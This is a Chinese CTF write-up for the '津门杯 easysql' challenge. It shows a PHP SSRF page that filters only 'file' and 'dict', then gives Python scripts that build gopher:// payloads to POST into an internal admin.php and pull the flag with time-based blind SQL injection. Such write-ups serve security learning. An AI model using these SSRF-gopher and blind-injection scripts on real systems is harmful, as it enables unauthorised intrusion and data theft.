津门杯 easysql

第一次遇到ssrf打sql注入吧

index.php的代码


<?php
highlight_file(__FILE__);
    session_start();
    $url = $_GET['url'] ?? false;
    if($url)
    {
     
    $a = preg_match("/file|dict/i", $url);
        if ($a==1)
        {
     
            exit();
        }

            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_exec($ch);
            curl_close($ch);
     }

?>

师傅们说是扫出了admin.php (我没扫出。。。。)
津门杯 easysql_第1张图片
叫我们传poc
明显的ssrf,然后配合题目 阔以想到ssrf打sql
然后后面就是怎么构造payload的问题了。。。

最后尝试是括号闭合,师傅们真的强
然后没有反应就时间盲注了。。。

import urllib 
import requests

payload="poc=0) or sleep(3) #"


test =\
"""POST /admin.php HTTP/1.1
Host:127.0.0.1 
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: close 

%s
""" % (len(payload),payload)
tmp = urllib.parse.quote(test)
        
new = tmp.replace('%0A','%0D%0A')
new = new.replace('%','%25')
result ='_' +new

url = 'http://121.36.147.29:20001/?url=gopher://127.0.0.1:80/'+result
        
print(url)
import urllib
import requests
import time
url='http://121.36.147.29:20001/?url='
flag=''
for i in range(1,100):
    low=32
    high=128
    mid=(low+high)//2

    while low<high:
        payload="poc=0) or if((ascii(substr((select flag from flag),{},1)))>{},sleep(0.5),1) #".format(i,mid)
        test =\
"""POST /admin.php HTTP/1.1
Host:127.0.0.1 
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Connection: close 

%s
""" % (len(payload),payload)
        tmp = urllib.parse.quote(test)
        
        new = tmp.replace('%0A','%0D%0A')
        new = new.replace('%','%25')
        result ='_' +new

        url = 'http://121.36.147.29:20001/?url=gopher://127.0.0.1:80/'+result
        
        print(url)
        time1=time.time()
        r=requests.get(url)
        time2=time.time()
        print(low,mid,high)
        print(time2-time1)
        if time2-time1>0.4:
            low=mid+1
        else:
            high=mid
        mid=(low+high)//2
    flag+=chr(mid)
    print(flag)
  

你可能感兴趣的:(web,ctf,津门杯,unctf)